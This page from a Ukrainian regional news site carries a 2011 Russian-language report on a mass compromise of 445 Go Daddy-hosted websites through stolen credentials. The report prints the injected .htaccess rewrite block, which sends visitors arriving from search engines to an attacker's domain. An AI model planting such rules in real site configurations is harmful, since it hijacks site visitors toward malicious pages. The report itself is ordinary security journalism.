Житомир-Експрес
регіональний сайт новин

Червер, 18 квітня 19:54
Анонси
В епіцентрі
Волейбольний клуб «Житичі-Полісся» здобув бронзову сходинку Чемпіонату України
Волейбольний клуб «Житичі-Полісся» здобув бронзову сходинку Чемпіонату України
Волейбольний клуб «Житичі-Полісся» здобув бронзову сходинку Чемпіонату УкраїниЖитомирська волонтерка закликає містян продовжувати допомагати захисникамПроектна команда «Лабораторії підприємництва» взяла участь у тренінгу з підсилення спроможності громадЖитомирські артисти передали чергову гуманітарну допомогу Баранівській громаді

Программа телепередач на TVgid.ua.
Все последние новостиУкраины на ukr.net.
Автопродажа Renault для автолюбителей Украины.
http://job.ukr.net/ - вакансии со всей Украины.

Світ
21 сентября 2011, 08:37

Пользователи Go Daddy пострадали от массового взлома

Директор по информационной безопасности компании Go Daddy, Тод Редфут, рассказал
Массовая атака на 445 сайтов заключалась в внедрении вредоносного редиректа в файлы .htaccess. Go Daddy быстро устранили враждебный код, чтобы обезопасить своих потребителей и восстановить полный контроль над зараженными сайтами.

Директор по информационной безопасности компании Go Daddy, Тод Редфут, рассказал домену Wire: "Аккаунты были взломаны при помощи паролей и логинов пользователей".

Пока неясно как были получены пароли, необходимые для осуществления атаки, однако, скорее всего, объяснением может послужить целевая фишинговая атака. Go Daddy продолжают расследование, но Редфут предполагает, что корень массовой атаки нужно искать за пределами контроля Go Daddy.

"Инфраструктура не была нарушена, поэтому наши клиенты не должны пострадать", - заявляет он.

Фирма, занимающаяся веб-безопасностью, Securi, предупредила о массовой атаке в четверг. В записи в блоге, посвященной атаке, они говорят о том, что вредоносный код был скорее направлен против пользователей, которые заходили на пораженные домены через Google или другие поисковики, чем против тех покупателей, которые выходили на сайт напрямую. Такой вид мошенничества часто является неотъемлемой частью манипуляционных атак на поисковики, разработанных с целью переадресации пользователей, находящихся в поиске определенного контента:.

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]

Подобный тип мошенничества часто основывается на неправильной установке WordPress и схожих систем. Таким образом, бесцеремонная кража паролей в данном случае является подтверждением того факта, что злоумышленники становятся все более и более агрессивными в своей охоте за потенциальными жертвами.

xakep.ru
Погода, Новости, загрузка...